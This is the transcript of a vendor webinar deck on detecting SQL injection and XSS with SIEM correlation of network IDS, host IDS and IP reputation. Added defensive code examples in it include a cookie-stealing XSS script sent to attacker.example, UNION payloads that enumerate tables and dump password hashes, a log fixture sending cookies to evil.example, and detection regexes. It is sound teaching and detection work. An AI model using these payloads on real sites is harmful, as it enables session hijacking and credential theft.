Transcript
Page 1: How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation

Tom D’Aquino, Sr. SIEM Engineer

HOW TO DETECT SQL INJECTION & XSS ATTACKS USING SIEM EVENT CORRELATION

Page 2

AGENDA

Today's Threat Landscape: Realities & Implications

Web Application Attacks: What are they and what harm can they bring?

Threat detection through correlation of NIDS, HIDS and IP Reputation

AlienVault Unified Security Management (USM) at a glance

Demo environment details

Live Demo of USM

Data collection and correlation from a Network IDS to detect web application attacks

Leveraging the OSSEC HIDS agent to monitor web server logs for web application attacks

Page 3

THREAT LANDSCAPE: OUR NEW REALITY

More and more organizations are finding themselves in the crosshairs of various bad actors for a variety of reasons.

The number of organizations experiencing high profile breaches is unprecedented; SMBs are increasingly the target.

Despite the BILLIONS spent every year on IT security, >80% of organizations EXPECT to be breached every year.

~ Gartner 2012

In 2012 (and we expect this to rise in 2013 and into 2014), 50% of all targeted attacks were aimed at businesses with fewer than 2,500 employees. In fact, the largest growth area for targeted attacks in 2013 was businesses with fewer than 250 employees; 31% of all attacks targeted them.

Page 4

THREAT LANDSCAPE: WEB APPLICATION ATTACKS

XSS (Cross Site Scripting) and SQL Injection are two of the most common methods of attacking web applications.

XSS attacks give attackers the ability to inject script into websites they do not own; the script then runs in the browsers of that site's other users, with the same access to the site as those users.

SQL Injection attacks let attackers run SQL of their own choosing against the application's database, most often to extract information such as sensitive user data or user credentials.

Page 5

THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS

XSS attacks typically require some kind of web form that allows users to post content to the website, such as:

Comment forms on blog sites

Forums, message boards, etc.

XSS attacks are easy to carry out using tools like the Browser Exploitation Framework (BeEF): http://beefproject.com/

XSS attacks are typically used to compromise a user's local system and install malware, or to impersonate the user on the affected website by stealing their session cookie (cookie hijacking).

Page 6

THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS (CONTINUED)

Once the script is inserted into the web page, it is automatically executed by the victim’s web browser when the web page is loaded.
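The stored-XSS mechanism described above, as an added example (not code from the deck or from AlienVault): a constructed comment carrying a cookie-stealing script, the vulnerable rendering that pastes it into the page verbatim, and the hardened rendering that HTML-encodes it first. The template, the comment text and the attacker host attacker.example are all made up for the illustration.

```python
import html

# Constructed sample: what an attacker types into a blog comment form. Once
# stored and served back, the script runs in every visitor's browser and ships
# their session cookie to a host the attacker controls (attacker.example is
# a placeholder).
COMMENT = (
    '<script>new Image().src="http://attacker.example/c?"'
    '+encodeURIComponent(document.cookie)</script>'
)

PAGE_TEMPLATE = (
    '<html><body><h1>Comments</h1>'
    '<div class="comment">{comment}</div>'
    '</body></html>'
)


def render_vulnerable(comment: str) -> str:
    """Stored XSS: the comment is pasted into the page verbatim, so the
    browser parses any tags it contains as real markup and executes scripts."""
    return PAGE_TEMPLATE.format(comment=comment)


def render_escaped(comment: str) -> str:
    """Hardened: HTML-encode the untrusted text before it goes into the page,
    so <, >, &, " and ' arrive as entities and the browser shows them as text."""
    return PAGE_TEMPLATE.format(comment=html.escape(comment, quote=True))


def has_executable_script(page: str) -> bool:
    """Minimal check used to contrast the two renderings: a real <script> tag
    survives only in the unescaped page."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("vulnerable page runs script:", has_executable_script(render_vulnerable(COMMENT)))
    print("escaped page runs script:   ", has_executable_script(render_escaped(COMMENT)))
    print(render_escaped(COMMENT))
```

Two caveats worth keeping in mind: html.escape is correct only for text placed in an HTML element body, and data placed inside an attribute, a script block or a URL needs the encoder for that context; and marking the session cookie HttpOnly stops document.cookie from reading it, which defeats this particular payload but not the many other things an injected script can do in the user's session.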

Page 7

THREAT LANDSCAPE: SQL INJECTION ATTACKS

SQL Injection attacks are commonly used to extract sensitive information from web applications. Examples include:

User account information, i.e. email addresses and passwords

Stored credit card data

System configuration details

Page 8

THREAT LANDSCAPE: SQL INJECTION ATTACKS (CONTINUED)

There are SQL Injection tricks that attackers can use to find your interesting data, such as listing all of the tables in the database by querying the database's own schema catalogue:
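The table-enumeration trick described above, as an added example (not the deck's or AlienVault's code) against a constructed SQLite database: a search function that splices user input into SQL, the UNION payload that reads the schema catalogue to list every table, a second payload that dumps the users table it found, and the parameterised version of the same query on which both payloads are harmless. The tables, rows and the hash value are all made up; on MySQL, PostgreSQL or MSSQL the catalogue is information_schema.tables rather than sqlite_master.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a web application's database
    (SQLite here; the same injection works against MySQL, PostgreSQL, MSSQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99);
        INSERT INTO products VALUES (2, 'gadget', 19.99);
        INSERT INTO users VALUES (1, 'alice@example.com', '$2b$12$not-a-real-hash');
        """
    )
    return conn


def search_vulnerable(conn, term):
    """Vulnerable: the user-supplied search term is spliced into the SQL text,
    so a quote in the input ends the string and the rest runs as SQL."""
    sql = "SELECT name, price FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened: a bound parameter. The driver sends the term as a value, so
    the same payload is just a product name that does not exist."""
    return conn.execute(
        "SELECT name, price FROM products WHERE name = ?", (term,)
    ).fetchall()


# Constructed payloads. Each closes the open quote, appends a UNION whose
# column count matches the original SELECT (two columns), and uses "--" to
# comment out the trailing quote the application adds.
# Step 1: list every table by reading the schema catalogue.
ENUMERATE_TABLES = "' UNION SELECT name, type FROM sqlite_master WHERE type = 'table' --"
# Step 2: pull the interesting table found in step 1.
DUMP_USERS = "' UNION SELECT email, password_hash FROM users --"


if __name__ == "__main__":
    db = build_demo_db()
    print("normal search:      ", search_vulnerable(db, "widget"))
    print("tables via injection:", search_vulnerable(db, ENUMERATE_TABLES))
    print("users via injection: ", search_vulnerable(db, DUMP_USERS))
    print("same payload, bound: ", search_safe(db, DUMP_USERS))
```

The two-step sequence is exactly what a detection rule should expect to see in the web server log: first a request whose query string contains UNION SELECT against the catalogue table, then a second one naming a real table. Both are visible in the URL when the parameter is sent via GET, which is what the NIDS and HIDS examples later in this deck key on.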

Page 9

THE ALIENVAULT USM SOLUTION: NETWORK INTRUSION DETECTION

Network IDS is embedded in our platform, giving you the ability to detect network level attacks including identifying malicious web requests sent to your web server.

Network IDS signatures are updated frequently to keep you on the front lines of advanced detection

Page 10

THE ALIENVAULT USM SOLUTION: HOST INTRUSION DETECTION

With Host IDS, you can monitor the logs of your IIS or Apache web server for indications of XSS and SQL Injection attacks.

Web server log monitoring

File integrity checking

Operating system logging

Centralized management

Page 11

THE ALIENVAULT USM SOLUTION: IP REPUTATION

Tracking activity from attackers around the world allows AlienVault USM to alert you when known bad actors are hitting your web site.

Automatically correlates known attackers with malicious activity detected from both the network and host intrusion detection systems
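The three detection sources on pages 9 to 11 (network IDS, host IDS reading the web server log, IP reputation) and the correlation between them, as an added example that is not AlienVault's code and does not use its signatures, rules or risk formula. It runs a few constructed Apache access.log lines through simplified SQL injection and XSS patterns of our own, then raises the priority of each hit when the same source also appears in a constructed list of NIDS alerts, in a constructed reputation list, or got a 200 response from the server. The log lines, the NIDS alerts, the reputation entry, the patterns and the scoring are all assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache "combined" access log lines, the kind the HIDS agent
# reads from access.log. The attacker's tool percent-encodes the payloads.
ACCESS_LOG = """\
203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "GET /products.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:13:55:41 +0000] "GET /products.php?id=1%27%20UNION%20SELECT%20table_name%2C2%20FROM%20information_schema.tables-- HTTP/1.1" 200 4096 "-" "sqlmap/1.0"
198.51.100.9 - - [10/Oct/2013:13:56:02 +0000] "GET /comment.php?text=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2013:13:56:30 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Constructed NIDS alerts on the same traffic (one Snort/Suricata-style event
# per source) and a constructed IP reputation list.
NIDS_ALERTS = [
    {"src": "203.0.113.7", "signature": "WEB_SERVER SQL injection attempt (UNION SELECT)"},
    {"src": "198.51.100.9", "signature": "WEB_SERVER cross site scripting attempt"},
]
REPUTATION = {"203.0.113.7"}

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

# Simplified patterns of our own; real NIDS signatures and HIDS rules are far
# more extensive. Matching is done on the URL-decoded request.
SIGNATURES = {
    "sql_injection": re.compile(
        r"(?i)(union\s+select|information_schema|sqlite_master|"
        r"'\s*or\s+\d+\s*=\s*\d+|--\s*$|;\s*drop\s)"
    ),
    "xss": re.compile(r"(?i)(<script|javascript:|onerror\s*=|document\.cookie)"),
}


def parse_access_log(text):
    """Turn combined-format lines into dicts; decode the URI once so that
    %27 / %3C style encoding cannot hide a payload from the patterns."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        ev = m.groupdict()
        ev["status"] = int(ev["status"])
        ev["uri_decoded"] = unquote_plus(ev["uri"])
        events.append(ev)
    return events


def classify(uri_decoded):
    """Names of the attack classes whose pattern matches the request."""
    return [name for name, rx in SIGNATURES.items() if rx.search(uri_decoded)]


def correlate(events, nids_alerts, reputation):
    """A HIDS log match is the trigger; the same source seen by the NIDS, a
    reputation hit, or a 200 response each raise the alert's priority."""
    nids_by_src = defaultdict(list)
    for alert in nids_alerts:
        nids_by_src[alert["src"]].append(alert["signature"])
    alerts = []
    for ev in events:
        kinds = classify(ev["uri_decoded"])
        if not kinds:
            continue
        priority = 2
        reasons = ["HIDS: %s pattern in web request" % ",".join(kinds)]
        if ev["src"] in nids_by_src:
            priority += 1
            reasons.append("NIDS: " + "; ".join(nids_by_src[ev["src"]]))
        if ev["src"] in reputation:
            priority += 1
            reasons.append("IP reputation: source is a known bad actor")
        if ev["status"] == 200:
            priority += 1
            reasons.append("server answered 200: the attack may have succeeded")
        alerts.append({
            "src": ev["src"], "ts": ev["ts"], "kinds": kinds,
            "uri": ev["uri_decoded"], "priority": priority, "reasons": reasons,
        })
    return sorted(alerts, key=lambda a: a["priority"], reverse=True)


if __name__ == "__main__":
    for a in correlate(parse_access_log(ACCESS_LOG), NIDS_ALERTS, REPUTATION):
        print("priority %d  %s  %s\n    %s" % (
            a["priority"], a["src"], a["uri"][:60], "; ".join(a["reasons"])))
```

Three limits of log-based detection that this example makes visible: the access log only holds the request line, so a payload sent in a POST body never reaches the HIDS and the NIDS has to catch it; decoding once handles ordinary percent-encoding but a double-encoded payload (%2527 for a quote) needs the decode repeated until the string stops changing; and a 200 response is a hint that the injection was accepted, not proof, so the higher priority should drive investigation of the server's own logs and database activity rather than stand as a verdict.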

Page 12

Figure out what is valuable: Asset Discovery

Identify ways the target could be compromised: Vulnerability Assessment

Start looking for threats: Threat Detection

Look for strange activity which could indicate a threat: Behavioral Monitoring

Piece it all together: Security Intelligence

Asset Discovery
• Active Network Scanning
• Passive Network Scanning
• Asset Inventory
• Host-based Software Inventory

Vulnerability Assessment
• Network Vulnerability Testing

Threat Detection
• Network IDS
• Host IDS
• Wireless IDS
• File Integrity Monitoring

Behavioral Monitoring
• Log Collection
• Netflow Analysis
• Service Availability Monitoring

Security Intelligence
• SIEM Correlation
• Incident Response

Page 13

UNIFIED SECURITY MANAGEMENT

“Security Intelligence through Integration that we do, NOT you”

USM Platform
• Bundled Products - 30 Open-Source Security tools to plug the gaps in your existing controls
• USM Framework - Configure, Manage, & Run Security Tools. Visualize output and run reports
• USM Extension API - Support for inclusion of any other data source into the USM Framework
• Open Threat Exchange - Provides threat intelligence for collaborative defense

Page 14

DEMO NETWORK DETAILS

The demo environment that we are testing in today contains the following:

Page 15

NON-DEFAULT CONFIGURATION

Apache access.log monitoring is not a default behavior of the AlienVault HIDS agent: the agent has to be told to read the log. Since the agent is OSSEC-based, that means adding a <localfile> entry for the access log with <log_format>apache</log_format> to the agent's ossec.conf; until that is done the web attack rules have nothing to match against and no SQL Injection or XSS events will appear from the host side.

Page 16

NOW FOR SOME Q&A…

Three Ways to Test Drive AlienVault

Download a Free 30-Day Trial

http://www.alienvault.com/free-trial

Try our Interactive Demo Site

http://www.alienvault.com/live-demo-site

Join us for a live Demo

http://www.alienvault.com/marketing/alienvault-usm-live-demo

Questions? [email protected]

